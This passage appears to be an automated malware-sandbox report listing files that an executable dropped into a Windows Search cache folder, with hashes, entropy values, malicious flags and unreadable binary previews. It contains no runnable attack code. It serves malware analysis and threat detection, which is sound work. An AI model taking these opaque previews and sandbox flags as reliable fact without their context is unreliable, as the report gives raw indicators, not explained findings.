                                                                                                                                                  Preview:(func#t..*.o.eB......2.RL\.wy...T.;V...*.u.S.F^.....~....[..'....QrO...=..*....G.g.h....N...M.Z..z.XU.q.`..sf..@......A.3.K..K.s..yN~.../`...[...'0M..$...i.......d...TU.i.wD`...2P...x....0.b>.....G`<M...C;..I..L.C.h...D.ON/.4.0....L.....x^..U..Q.....^`......\w.A6..$Ua._....S./..M..p-..P...J.E.b..\../....c...'.Y`.....n[.V.!u.q6J^..M..'.#4.......o......?.Y.B.(pI<.W..)ba...x.g.m@.geV.t......S&F.{/.L..].xP.... .y.|<.....jT...&%# e.Om...Lh..s...~..J.....9..y..3..o.....K*.,..B%...'...)...Hr...v...(..S.2^v.y......O.A.O.ZY,_.....=...bP.(c...U..VT.Im.%/......6....+F..N... ..y'..f.))..t.J...;..H..FO...mt.....tB.Xz.*.8.<...X........o.=..g.]..@...B?.....:B..l.....z.W...|!..../Mv+......l.n.....Bi..F.L..*`....q_.(w..M:M4..Ey..H...K.}..(H.j../.MO..b...lb..a...o.+....Tz.*6...5.&....[.1..Mvj<..r+....}.R9Vv...V.{.:.o...[..5.4..+m.....7IZ....[......P|S.....".8......1.2......1...@.:....H.|..J.FV2..^..8.l..!.%.{.i."U:.M.W.-v.,s&.0Uz...T..37...Y.k.....

                                                                                                                                                  C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\AC\AppCache\ZEGESUAP\7\YfXD9vOw8__a60l-k1HNCxSbem4.br[1].js

                                                                                                                                                  Download File
                                                                                                                                                  Process:C:\Users\user\Desktop\E0tabE4K4r.exe
                                                                                                                                                  File Type:data
                                                                                                                                                  Category:dropped
                                                                                                                                                  Size (bytes):59090
                                                                                                                                                  Entropy (8bit):7.99692478340302
                                                                                                                                                  Encrypted:true
                                                                                                                                                  SSDEEP:1536:uipgrCEqv0cYfb33EUqi/OTQ5cTppK/bQs:2rCE7nfb33tZkTpATQs
                                                                                                                                                  MD5:7C7B1F4F92F81EA242A45304A437451F
                                                                                                                                                  SHA1:5F79510132810B623A7931E99B5E3698DD05F967
                                                                                                                                                  SHA-256:9C5CA0B0455D05D2B1FB23531B326A963E0F0D59573E0C8084A89A13CC2E8654
                                                                                                                                                  SHA-512:9F83ADCDC425495FF193E473A3475BB626205B46419330BE0616AABA14D08F3D1904A79B0E9EAFD3AFF747F7309FE9C67D8606BE1E1B4621B775100A0206A058
                                                                                                                                                  Malicious:true
                                                                                                                                                  Preview:var W..T..P/8hk..8.c..\.X..a..v..K?.&...i.. W.o !.~.1O.xN...5.,.x.r..G&..'...@.Zs.B5.aF.VT.[..5...Le.wyz..K+..v..SLcJ......1\..Y.......8.(..-.....{..Wzh....[/.h...).......V..lG...v.!...T......=..N..........|m...3.1"l..H.Z$....'...@...woL...<....c.<`#K......\....F.^.c...N#=*.......|.mKH...-.fF..W.......{...}}.m.;{M1...B*...P.....r...(.$r`..7.U.H0...Gh'$..r{.|..V..../6....9...V,sz.6....._....8.4.>.-.F/...-{._....N.I)..bP.|..@..<@.m..J..H)Z:..(....d.Z.\.G.?...<.q.kigK.O..;k#......L..j.....*\..KU...}...c.f>A.4.......i%...Jb...o....U..g.bW..4..LZ..\].....B..A..I.".+...B.w.F(..&..r.L=.!e.V.eg..N.50%..>.P.L......*.....Yw.u.8...g.[....K...;.M.U.n....-.W.z..@./..}..n.zs'.).....................Na..s..J.@.."..n.....g.sf.#V........./.N....$.P..P/.|[Br..A.N...y...)..b.....e..Z.lr9!.......[..H.#n...sS...,_.G.p.....Vm6....,.T.s@6...^Dlt.o.N..`..D<..& a.....5..C.... ........W.....;m.^m.....u..,6.$....*...'N.K$..'...?.|...I`A...f.8....$..*

                                                                                                                                                  C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\AC\AppCache\ZEGESUAP\7\aABLNT_FV45QjYQfnRHrBCAk4GU[1].js

                                                                                                                                                  Download File
                                                                                                                                                  Process:C:\Users\user\Desktop\E0tabE4K4r.exe
                                                                                                                                                  File Type:data
                                                                                                                                                  Category:dropped
                                                                                                                                                  Size (bytes):121548
                                                                                                                                                  Entropy (8bit):7.998282261553563
                                                                                                                                                  Encrypted:true
                                                                                                                                                  SSDEEP:3072:fqrslnzKWltcyJv4xBmPbESqEeRWGoUybcU14AFkQk:fxztTT1bpqZEbcU15Fpk
                                                                                                                                                  MD5:CF6588F8AC17D81532F9C03896B4BE75
                                                                                                                                                  SHA1:39E8971124CCD4EC11973B1FA7119F7445101800
                                                                                                                                                  SHA-256:C9A75C199D9B040FDCE19FB572CFDD99B2420EAACE8641A55AAB7F1927963D97
                                                                                                                                                  SHA-512:505998C29E9ADB18E5A3D67CC049CDF65AB6ED9C7D8D3AF2C393F4379ADDC9AD592313184E3993255CBC3E7BE04745ECB0FC94E15A4D62BD63A74CFA37153B32
                                                                                                                                                  Malicious:true
                                                                                                                                                  Preview:/*!. N..z...:\.h....S.u.q..Zb.Cx.9....N...a.b..28............^SD+.._...g.k.. . ..}%hCq.YJg#-:'.j....B.....\.~...R...G.q.Fa,...)`..5.7....f....c.eg....uw.I.>|T)..o.m..H.!2...D....PU../xo..\..k(J..l...`.._...A1.K....c..7Y.m....pn..KZ.g.B...H.....=.V..E8...8...Id..|.......|...;...['..#!..K.UA=......6o..3v.<z'M...+.s.]2....~...H.^Ob|S...;..;}[r..;n,....E...'.....7.....e..o..A.s.....R.I^..;g...[.B....YG.,..Fy/&..V...k..}C5u......s....r.{\.9....Q.....P..*......9...@.qws.K,jB.@.|....Gx....}Rr+u...G5O:.Zl..........9!..q..._G.....\)..A{.......c..3.W.7.d_lsI.j.B.....].....`.e..G...7.{..k.....+{......O.j.G......q.M...%.l(;.YO'.K.].7.W..Nb....r...T.m..M.+.........xf#..:..C.9`.?.,,....t.jQT.._..M.B/.N...u..Ql...}~.[s8...N.7....5Y(>....s;..Fl......6W...3...>m..'...3.A}..m.NJ.......$.y.&*.K.e.u..........8..}.k..+..+...z....."..%(.. A.../..a..roF...G.."g.)..<.w.[......P.+q...g..j....].%sa.....GI..B.a....Gl.#p.2.[...k..G.c.Z..&j...z./..t...5b...h..?. .

                                                                                                                                                  C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\AC\AppCache\ZEGESUAP\7\appcache[1].man

                                                                                                                                                  Download File
                                                                                                                                                  Process:C:\Users\user\Desktop\E0tabE4K4r.exe
                                                                                                                                                  File Type:data
                                                                                                                                                  Category:dropped
                                                                                                                                                  Size (bytes):3484
                                                                                                                                                  Entropy (8bit):7.951722282551283
                                                                                                                                                  Encrypted:false
                                                                                                                                                  SSDEEP:96:VvP1Vv4ZEMZwnI97oaeC7hKJAPepY2naINDsQT2:VXPwlWnI97oavciPepY2naz42
                                                                                                                                                  MD5:330E4B1E2C8EDFEDB3B5FAB40324762E
                                                                                                                                                  SHA1:B000976A3AB57AE7625966DCB697F3A36C6B7A26
                                                                                                                                                  SHA-256:D834E8B76085227EBF068670E68AC0FA1EFC9977C62BAE1E239006D9694D2309
                                                                                                                                                  SHA-512:B5980AE43B5AE2FD618CD4A48E42AE2560D0D8A3AEDA1FF2A8E95A406D1644263A6128788DF57B460E2C97B47ABE34614763B4603B3A8689EED4D96586387EFB
                                                                                                                                                  Malicious:false
                                                                                                                                                  Preview:CACHE0..g...)......\..MR.o.3..=.b..I!.`.3;...'..}}k).6-.q..|.j1..'.......p..,2#..vF.G7\.........z.{..1..\..L..}....l@..RLj.2|8w..< :..zy.....[.E....78C.V.w.W....Y.#..8.y.I..y..O..G,`.f..w........g*..n......|.b.n..L*..T.>S.v.$?.G|.;..9I....V..C....1+.k....M...?...8[.T.x.w..7.hgl.SK+..7.M.......?%.(.N,..qN.,1..j..].J.xP..l.........*...p.F..3....9{2..o...\$K....x?.{..4....c.b.......W....Z..y.....=....@^.B.....j...........\...<...P.......:...k\.y...Q..,A..34...{O.K./..G..W.D.`.!.Tf....(.F...q....e.t.o......z..Df..:.P.+T...Ld...i/*..x......L.[..i....r..]..M>......;.&..b-..h...<.s.*..Q.t....*Q...*...Q.'.a......#v_\[.v..q...=...A..&QC......*g.XbD.........)*4G..JK...G.Q+7.UI%LIi...\..d....W.%....BM......P.O7-._"..U*....^YI.....*.c...]...\...R.....}:SNk.@.J..)1(...z].'.B.A~j.s}[...q.A<..X#.Q.:...b4X\....~%&8%.......P..D+.#.;:..{....?S....g...Y.......Y.><.......E....`.............:....".l>.....by.....t.X....N.`%.....r.:f?..*.e......j....u.p5K..b.

                                                                                                                                                  C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\AC\AppCache\ZEGESUAP\7\axXWui3EcbJQ5EbqyMZWmTud9p8.br[1].js

                                                                                                                                                  Download File
                                                                                                                                                  Process:C:\Users\user\Desktop\E0tabE4K4r.exe
                                                                                                                                                  File Type:data
                                                                                                                                                  Category:dropped
                                                                                                                                                  Size (bytes):4070
                                                                                                                                                  Entropy (8bit):7.959916331697754
                                                                                                                                                  Encrypted:false
                                                                                                                                                  SSDEEP:96:6RiGV/6lVc6KrG8FFjdaAutkl0t8pyQNvnpMrLboBy91HJ9w:6Rh+e6IFpIVtkqtun5BQc
                                                                                                                                                  MD5:16217DC9731A66E425C55493E4D514C3
                                                                                                                                                  SHA1:8C3C3C44EBECC1F119C43F90A6BC263E28D5548F
                                                                                                                                                  SHA-256:B1B8B1563934EFEFDCC993B34A37C99C2EED831FEEADBF36FB5B9DC4E6A9C2CC
                                                                                                                                                  SHA-512:59B849689C5649755076A9384496110E3CB17B0C047448AB85B084C8642A362C14FB0FBAEC5C1F49B8C88B5AD7B44FC973D73BA135BD43DF45E7EA2A6B76C292
                                                                                                                                                  Malicious:false
                                                                                                                                                  Preview:var W\s....U.....q...E..d...'.b..L.H.^..Cn.e*.gFV..7..2s$.J....U..=>.l2.R.QJ..O......+.....D..%n..#+1.*.....j+.*../j.<....6.....!......K#.x.....s....S ..R..t....J..p.}."...g..=.Y..i.-..e.".Y....!!..[.S..JUl.|..C]...c.`.(Q.o........AVf...Nz.V.Ig..e....U...^.D......ck..{r].v8/...#^...............s...P.....g..F..86r...p.KPZ%........(......6LI..f.....X.M...3S{.~..4..#W...X.U.......E.P>...-Xx.mI...#/..#..D..)q..j...|;o..:.3....&.y.........X5fs.Y.......Q.y7]...A>-...\..m:i.|u..t.Jx..,a...%.R....F.+.OR......)7...fX.I.*....er.y....y;...{..49..(...(.{R......lpWH..0D3.]..Hq7..Z...DL...Q.....b.[..=..A9......8...6M%....u....I..ou.)...._b.u.4....i^.`WX.<..].O.....F. }3)......j...-HW....>"s...vm...*t...j..cmb...=.@.%4........u......qv..z.s...T.....*b."..Y...d......T9Lg......L[.;..t^-...z..........F. ...rWo..@#........}.\?.......~...~o.OS.0.a.....2.~....S.O-....=f...avmQ.sr...e$le..d..!....?>F].+P..K..../...c....J.. :..jE.~9.w.r.......[...

                                                                                                                                                  C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\AC\AppCache\ZEGESUAP\7\dYw9trBOUuy7sL9xTZGIliMEagg[1].css

                                                                                                                                                  Download File
                                                                                                                                                  Process:C:\Users\user\Desktop\E0tabE4K4r.exe
                                                                                                                                                  File Type:data
                                                                                                                                                  Category:dropped
                                                                                                                                                  Size (bytes):290621
                                                                                                                                                  Entropy (8bit):7.2067981985785625
                                                                                                                                                  Encrypted:false
                                                                                                                                                  SSDEEP:6144:d0SQc7NLOup1Ofwc4XpcsUCnZWHDH8HDHcHRHOHVjbUq7jdBBVbKyOqaYVHRRmGj:t17Npp1OfqXp1UCnZWHDH8HDHcHRHOH/
                                                                                                                                                  MD5:CBEA7ACAABC9C8A90E4CD844E72AA0E6
                                                                                                                                                  SHA1:A70E7B111DB3CA269C317F185EEB01ACCE7A1DC1
                                                                                                                                                  SHA-256:8D0D7A36121B0AC6A27A4B53D24AD891F4748E6F5EE7EA7A4DF1617BA52517FB
                                                                                                                                                  SHA-512:44BFD3DB4E77FB0E6044B196238221B71D0F029642D65E9D09167BF4BFC12C8C4E5B5BD9D3197C53B483B8D1484872E5F952FE9696D0BD149A4A80E89A8DE061
                                                                                                                                                  Malicious:false
                                                                                                                                                  Preview:#topR...\...<..i...P....`....Q.....S:+,aW....*EI.c.=.H..V..{j...S8...(9].5...{...O.*/...Q....q...y..n..=)~KzM....t_b&.FsY...W..-J...5..l./.`..R.tG.h%.s@S......l.L"...s.5.,.....W......5D.Vf.Yi.I....Qi~4....7.........mE.(....`.zp..<Z..D&.....Q#u:....:..{.X....&}.A........{.2v.%.k.!.8..Y-.9.^.D.}............)5..4..!......`.j.`......j.S.t....'.%.Y0M..&57.&5kS....m.W....yL..$*..1/........,k....p...+.:....0...`n..=z.EPM.R...).......|.0y...L3...r..&~w..3...m......3{.th~lO...b.7B...2..A..bO.S...$*.....i........c..q...}.P.._Abl=.?a<.....$7.?. .....|....L.... CA..KC.[....?.Xb&......pr...h..........:b.Z.S6.$....w.ZZ.h.X...8.D.A/.&x....M...BR.......K...0.....tvz,.(..1..%O.\.$V.~.5....'.Q...u.....=Y.R...!.....{......g....t.W1.#6.-......Q....f.)|;%..:g.Z!.,cH..f..f.....g..7....T$..V.....B....~U..0'..M.`T>.*...5.x..p.sH_.A....-..O.RA.Mo....J...d...K.G.u.Y..z.+..eZ..t.d5_XJ .).U.....&..".x)..k..b....."].Z5 .KL.`...s.....=.....K.)..,..;2..].

                                                                                                                                                  C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\AC\AppCache\ZEGESUAP\7\h0_ymK9wPEJMicnVALPw5taHcNA.br[1].js

                                                                                                                                                  Download File
                                                                                                                                                  Process:C:\Users\user\Desktop\E0tabE4K4r.exe
                                                                                                                                                  File Type:data
                                                                                                                                                  Category:dropped
                                                                                                                                                  Size (bytes):2224
                                                                                                                                                  Entropy (8bit):7.914594716412933
                                                                                                                                                  Encrypted:false
                                                                                                                                                  SSDEEP:48:5sX8llu59yydCR536sS3h3tFhKBR4PE7mxjcnlMeURD:5sX/KKZhDh56mJ4l9w
                                                                                                                                                  MD5:889473824D2C4E45C8E350993D39BCF5
                                                                                                                                                  SHA1:296F91F14CB2B35926D14E455A7AA24E31B85C85
                                                                                                                                                  SHA-256:43033F926FCF61ACF08D6422DF22CBD3106BE4671172928B8ED6167922A19140
                                                                                                                                                  SHA-512:BFA4091E5414745F9EF05545351F9E123CCDDB792797E4D94700B227CD1CCB567916177C31A518DDC567F82891DF510E9F6EA4BD32BB417832C2DD1202F937DA
                                                                                                                                                  Malicious:false
                                                                                                                                                  Preview:var W1F8.j......H.3..Y..P.o+......B.x....P.,|~.8Tkay~....O....{..Qk....Qm...2.BF.PTJ..6.r.....l.V9..Y.L. v...^..]Tp. \.K.+.BQ..$..oz!.3.7...z...[....NY.....&.M&Sz..nk..........\L.PA...Q.....C.#Kr..x.:..0..Oq....&..hL<..+C9.8.M..3t..r/..o6..G.....X./.Pr.}..7.......e.a*....p....h.&.vXv.T....c`......j@uA{......M.-..S............V........^..*......E....h.x...._2.>J....A.......j...(Y+.....o.N..^....F.+.{..V..).0.:..5....e=.....V#....+ c-.%m..^7N..8.....;....~.7..I:d9(T.....\..X....q.J.V.i-.wA..U{..........B.%L.Oy..w.N...ur....0i.b.0....%\..[..;._..\...hb.s..~{..5.'&3y...x..;.r....'{.w'}.<.<....a.?tkX..S...F..t.uF..=...o...JP.>!.v.I..t......-|$.G..<}.@..0^....Qqx<3.G5._.x..8..B......\....|...h.N........~,./-.....;/.....d.rKM.]D...90....+P.+6...{.|.`.If.R<...|.......F......8:x.4O.]....8....1.ci.:.d>.~_.o....M.z.Fm:.n[..D..m4.S.I...$.a.X"\...s....b..9x..j.p.....T..O....3J.......@Y.}Z...N..4T.J}1.......i.3......ML.S.3!..-|./.T{....8..7.(..

                                                                                                                                                  C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\AC\AppCache\ZEGESUAP\7\hAbWEdFpz7sABSGHo92EV1SPXRQ.br[1].js

                                                                                                                                                  Download File
                                                                                                                                                  Process:C:\Users\user\Desktop\E0tabE4K4r.exe
                                                                                                                                                  File Type:data
                                                                                                                                                  Category:dropped
                                                                                                                                                  Size (bytes):172728
                                                                                                                                                  Entropy (8bit):7.946457297714974
                                                                                                                                                  Encrypted:false
                                                                                                                                                  SSDEEP:3072:KrPYKGZFdJI8vtrUowA7PQpRYDG7yikhiEI2eIwTbBITSj52E98K:sGLdJI8vRvzPs8L7ECwTR52K
                                                                                                                                                  MD5:C645080D62F4D219DB4C1BB26C731261
                                                                                                                                                  SHA1:510FDF938F21EB8F373CDC8DA5F0D69BCC8E8FAC
                                                                                                                                                  SHA-256:B93B4BAF8E308CF1CE7B52199549250552C641F46FDC21117BC1A4A149DFE5C6
                                                                                                                                                  SHA-512:1C4FA5FCBA1F9A8B62095DCFDE893756F2ADF858579CD69FF4AA6D83F38E85B8E7361EE5F2FB43D374D8AD4B2978838ABCF585BEAA3C0E978663BFC722E41BAE
                                                                                                                                                  Malicious:false
                                                                                                                                                  Preview:"use H9..k.........-...;...N0j!......@K.o...X.R.\<6..o....=..D....|.......9i.....HGm..Fi..[F..R:.w{..G.=V..:.3. QF.. .I.Z.a..?^03nQ.z..GC.U.=a...t(,.^.......n.f.k..8.].....>..q.sE..2..<......sAK....}.<../.!...b...b...0.cxH.4.....x.@v.~....Y......`PV.L+..\.N.S.5.0.l"..FV6.......S...>..s.....*D` .*....\...D&N....K.... .X..Em.v%t?{..l.....PE}.,)i.5.R.-d....+kr.}....m./.W.%n......0)=...&.mO.S.<.t...f..G..v/..!..y.G6..2..F.....h....x...0...!.Zt.@4.I.%....].........^.O...B{r.y..A'........XJJ[........YV....^"...T.n..t$1.qgt...r.......?....5....KH..LM..K(.....M.......m.5.:..`&.OC....O..QnpR24.q....Y....._r..W./*..~0.RR..-......N.6........$...Lk....,...pH.h.:G=...4.c~.|ob......Q...]x*....s...-..n.?D.TW..q.._9h9.?)F...kL.....6.<h..=n.........{$...|.^2Y.GeD..z....\.O..F.....]Z.;i=.....#.&.....v..z...mS2....,.....u.jSN.#.f$.........'.9.)...H@...rM3.Q......P....'.F.p....5a.@R.Z..qK.d...!.H...............:.%Fs5..o.(?.i ..Wh..0E0c.....E....T]Lj...f.{...L

                                                                                                                                                  C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\AC\AppCache\ZEGESUAP\7\j5xZRlJccnLYwHvUyxqh_abmeEE.br[1].js

                                                                                                                                                  Download File
                                                                                                                                                  Process:C:\Users\user\Desktop\E0tabE4K4r.exe
                                                                                                                                                  File Type:data
                                                                                                                                                  Category:dropped
                                                                                                                                                  Size (bytes):14700
                                                                                                                                                  Entropy (8bit):7.9881769892060435
                                                                                                                                                  Encrypted:false
                                                                                                                                                  SSDEEP:384:/xdTp2hBnMxhG4qS+m7XTvGUfbVJR1Q9oww6wrDSaRWdm:JdFuphDXWj+UfbVTya/0aSm
                                                                                                                                                  MD5:A9F3C2B00BB9A1337F0329411507B8D7
                                                                                                                                                  SHA1:C6C63667B703C4604354CD6D1D62B1BD287480AA
                                                                                                                                                  SHA-256:56B947A19345A6AF4990F1B516A3AC908B0DC6CD170F14F354ABFEDBCC51CB7D
                                                                                                                                                  SHA-512:7EFB2A63235579CDD370A6632F3E725B4CF0064FDF8DCB03F6D4D64EFD3900E2AD96AD8E496161594C2B59F6841A90D398715B5E3D242C5D8A6F1D88AF04A2EE
                                                                                                                                                  Malicious:false
                                                                                                                                                  Preview:var W.....F.&X..d(=.N.....9.<.F.X..0...%n..8^...7L..T>.p0.v'........O.N.%..y..s...VV...V..$........E.#.K..1....\9.v....!`../........hi.I.R.%.,....9c....H[....K.....F.?~.....4.........n..`t............}..w........."OO[..dO...%D.-.n..O.d.'.2E{.B&.d...s;.....~iLP%.G.......T........p..)'..I.......*e%.~....Q.m.....v.r......V12....l........M9V.....D...xu..}......S..W."..w%......R0.r....HC.....s.@z3S.sm..K&Z.K.7.....ndY..,....*...d.....&....@.:2G..}...:.+..o..^.mO..7x.|2........$..A.z.*. .+..HL.......S.P.da.oSq...[......w..r....sf.[K..3B.Xu..F.\.}..1..!.B..l.9..sI".lo..\...Zo.$T.y.>.:N.!.....a.A.Iv.}=...."+g3G.p.+..I.SK....qd..d_...k\7d,f.y..M_....c..hV..V...1x.q..b...|....(.....rm..B.$X#4..p./q...DV..$..j......E....B..E.`...}..CU.....G0...J:=.n..b...90.DV7....$2....Dkb..jo+.....4.'Vp.k`P....*".y.y."a.]....wz....j`......./.{...w..@2]...{{..YOR....Ma"..a..E`..+.>{.......(.....J.;..5.U3..3.S.%F.l....~.{rp....V._..\2Uq..h.!.:

                                                                                                                                                  C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\AC\AppCache\ZEGESUAP\7\l1NajuxeuQ3qDy6uCL1VS6rO4Lw.br[1].js

                                                                                                                                                  Download File
                                                                                                                                                  Process:C:\Users\user\Desktop\E0tabE4K4r.exe
                                                                                                                                                  File Type:data
                                                                                                                                                  Category:dropped
                                                                                                                                                  Size (bytes):1825
                                                                                                                                                  Entropy (8bit):7.882937044342027
                                                                                                                                                  Encrypted:false
                                                                                                                                                  SSDEEP:48:mpYFJjFSgY35QC7/iB2K4aLd4FCVmabdSiZKnPa9/KlD:HCVCo/iBFpiCVmut4yJKd
                                                                                                                                                  MD5:6DA4A4F35600CE3D5F00E6F61D05AE68
                                                                                                                                                  SHA1:AFEF43C900D4E39C1DD955FF4459F762933E4621
                                                                                                                                                  SHA-256:60A20449B205AAAE423F82DAD0B8B774C913884EFE18FF6DCDB1FCC0D3F145F6
                                                                                                                                                  SHA-512:5CAD4C528BDBA0E2B79C3188A79E05AC7E495903E3B4F0EF3E9AC437D4D41ECBEF584812D7434795D5E786DD2A03E501ED25D032A8DF1DDFE0A8A4D734BF3B2D
                                                                                                                                                  Malicious:false
                                                                                                                                                  Preview:var W.u...-B...+.s...G]'1y..U$xq.........-.P...8?.'..).`...Y...*-......`..?.m....8%.i......X.7..:....U...w.:.......z.8.9.."".X#..F..u...X.0.Hu...E..O.c.V>.-.A{}c.T..^18..xW..N.u.72.........R..>.....|..............f1....j.e\.J.......\....S~.........+e4..R.*U...uMk..r...Zd.D.:....e\JM.N.4^..c.d..q.B...M.k....&...+z.O1..W...s.X.B.D.V.V......E.......5.Q.G...7.x..@..?."t.."=.N..~dxzC..F...E..!D.g.e....9I.LT.e.....Bv........W..J..|M.$p..b.U<.R...d..... .xEc.;G.@c..(.......b...0..H...w.x..m..i......)vH.....7.V......C.ERG.z}.QN...$@........n...W....<)..*%..]}..v..?[..MB.4..s...o.....}....6.F..F..[(T...&C..Y;......6..k5..}..N...7-)H......<....r3m.ho.._z.J.>.?p<P6[%.0..uw.BUw..7.<`|.`.xp....?..UO..8?... .&Tc'..r.."...."..=.^.#....C..>.4..M....w...(....b.+v8^....._..V.......NU.5{..Us..P..y.Q0...92...B.5......h...>.<)!....Kn....a....?i#....q...N...C.O.>>..K...A[....\....2.v.......B....C*.....kwB6.H*.O...~...~..-"...O.....8....J..k.J<...+hA,..@...?H.v."9.....)

                                                                                                                                                  C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\AC\AppCache\ZEGESUAP\7\lu0mWeI3G2l7mRreeuIGIzuL1cw.br[1].js

                                                                                                                                                  Download File
                                                                                                                                                  Process:C:\Users\user\Desktop\E0tabE4K4r.exe
                                                                                                                                                  File Type:data
                                                                                                                                                  Category:dropped
                                                                                                                                                  Size (bytes):7794
                                                                                                                                                  Entropy (8bit):7.975438731791532
                                                                                                                                                  Encrypted:false
                                                                                                                                                  SSDEEP:192:OmpXVdIatAXIim30fg9Xaag7aOTWVJQVSThaTmi80:7HIMA4X0I9Kaf4ZTh
                                                                                                                                                  MD5:3C7B720FDB0C73EDD8F94ADCDA3E8807
                                                                                                                                                  SHA1:E98B370FFA719BA2B52B250928707AC5585FA309
                                                                                                                                                  SHA-256:9713F5F0410AB5E9EA17D57CD9DE5BE919F9EC2355E733EF7FA3A738FEC05988
                                                                                                                                                  SHA-512:AEBFF1C43C6CC315BAC5E3BADAC842452FB824B959411A094A16DFAB0C802C66F5A7F11DEFF2EB5A6DE69F38BD70A78E8968E7E75F51AC30AC0149802284C5D2
                                                                                                                                                  Malicious:false
                                                                                                                                                  Preview:var W.....L.p...jcr.)....'...Y......R:@.*..B4p..{)..L..z.D d...bl.Ln.../.h.B.F..S...x.....b....%I.....,T&R.,(E*.%.......;ND+.n->...a.g.;.&..r\].ySU..'%S..\cKP..?P..]1.8..........i.D.SK..e&l.bqG.@.+.....5.+.TT.^AB..|.v...W.....%.bG.....9.T.2..K7.qK....B..3...O....H....q....dE.kz..g...3.a.Sc......~>.....T...w..!!*hH.m.B....ow.\..P=..l{2.ny.\G_.*...3.&.n<....f5H.Q......_.;%O.I.(1.... .B..].._.p1..Wq.."6..W....g... U...A.....l...VS..~l56k.5...wu..@.........[.]....R!r...^...|.i...OB.... ../...k6.&.:+.@.92\.w...9..j.u........]J..={i".r?......n./2p'...5.8.?0R.A....n0X.....<R...n..?.. x..-.pEA.)"L..U&...b....@..4.....r.7Z.....,V..c.O.....?.p..n.n.)..'U.h...P.=e+.[&.....D.E.bY%..w..O.)..%.>h."}*S.....w3_t.0_.x.Z..V.<...M.o.}bD......R"_...Y...!..@....`N..f...."...{S*T.F...U.bZ..As.. ..*[...r..A...#)w.....GC..@..5f<.$2\. .>S....C{0].e.?..0W.........F[.....*......r!..\.|.,. ..\.*.B...80.^_a..MS.?a<.P.....>N....=({.n*d..h.+6.J.aq...#4.H'=..|

                                                                                                                                                  C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\AC\AppCache\ZEGESUAP\7\mb8fkd60iW7q4wvyDIlCm9OOn10.br[1].js

                                                                                                                                                  Download File
                                                                                                                                                  Process:C:\Users\user\Desktop\E0tabE4K4r.exe
                                                                                                                                                  File Type:data
                                                                                                                                                  Category:dropped
                                                                                                                                                  Size (bytes):44680
                                                                                                                                                  Entropy (8bit):7.995801114911424
                                                                                                                                                  Encrypted:true
                                                                                                                                                  SSDEEP:768:2cAUbgYr0YgXRoDMnyapx2+X2mFkyK3YDMQJ6FoxJ1wtojE8bwEj28XS:2Rrk0YgBcSCm2mKyIYz6FEJC+jXbwnZ
                                                                                                                                                  MD5:3450A892D6E8661CEC7C9FAB8B20CFC7
                                                                                                                                                  SHA1:CF11CE15DABFB733C2CCB3090B0E12CE0A0503F1
                                                                                                                                                  SHA-256:78C99E8CA244058DABA46B40C1C9415261E337F89129ED87EEA30C2946D6721F
                                                                                                                                                  SHA-512:B78EF3F0AF544153AE8F8D74C6976D5B38E49B9A83D707767D57E955BAC57881B785DFC178770C60570F8E292321464EF94A1E7413D3D004E91642E35BC63C1F
                                                                                                                                                  Malicious:true
                                                                                                                                                  Preview:var M....:.....\.....6....MP..CQb;H.....@.U.2...k..(ZY.3..X..'.....6..P...[F`.@..'.\..R..0d.ND..7.J$-U4..n.x"....h..^k...].s.r5......5IO...'....9~......jyu..U.k|}..*W.H...*.#...?......MF..l......$y.@...%...n...!w.}.B.@[.......w.yNZ..."x....w..]g;...?..y...X.L..U21.'0Z...I6......a=R....z...u.{......~.!...._...7...%!.H..`v(.^...xdd.....G.p...9?..M..G.B...q.....hg..:k/.......`.#....J..@IO.v.3.%.......=..z.F..:*.q8...o.%....E.....0N.?..<.A....9.......A..j...r.E.l..1.uu....x=..C.W..v..L.1._Wq.`.'....;f..z.+..b-.........>.-......E.P>s...B.F..."....J.T.k...ll..J......n.ai..(..Mq..!g.-9./....a/...G>5]..|...J....(N...s..b?..$..y....z..:Gib.v....`.a.Sm>....n...c.O.....u..QYP-J..R.RR.du.....s.|.z....:e.....#.8.0..2..0.....&&<n. oP..tX.*)i...g...i..tP...f...7.X...;.z...tK..|..5>.0'B8U.w."..g.G{..fZd......cz....P..7J..xK...*t...C..[H..p.A.....fS.L.....)H..?:-+..8..q/.6..V..........S..s.0..f.9.*..d0.._........-B.n)....!.\NJ8K........F....H..8...~..1...*..d.....n

                                                                                                                                                  C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\AC\AppCache\ZEGESUAP\7\n7LMSoHYYIBGa1VPMlnTzxBvlfA[1].css

                                                                                                                                                  Download File
                                                                                                                                                  Process:C:\Users\user\Desktop\E0tabE4K4r.exe
                                                                                                                                                  File Type:data
                                                                                                                                                  Category:dropped
                                                                                                                                                  Size (bytes):6235
                                                                                                                                                  Entropy (8bit):7.968560333719063
                                                                                                                                                  Encrypted:false
                                                                                                                                                  SSDEEP:192:/5bSmztCkI7XXqKviL6zuTTzjxlK7vMX4HS:/NFzwDXTiOUjW7UXwS
                                                                                                                                                  MD5:D903E0FD8DB74E70BE0DE1F2C3D8E3A1
                                                                                                                                                  SHA1:C125C44A8D91C053A06E8C97C45036685C09AAD2
                                                                                                                                                  SHA-256:91171F96CDDDC3182F43840EE1BF53B9BDD7DA7285E5748085BE69B711F151CB
                                                                                                                                                  SHA-512:1116AC9557556F3EFB56EFA96C995F3F0645897027DB3FCF7E9E8A082196F61533EE4DF43F4B42EBD6A1B9231949CEAD8DD0E42CC23B774D613E4C9183706460
                                                                                                                                                  Malicious:false
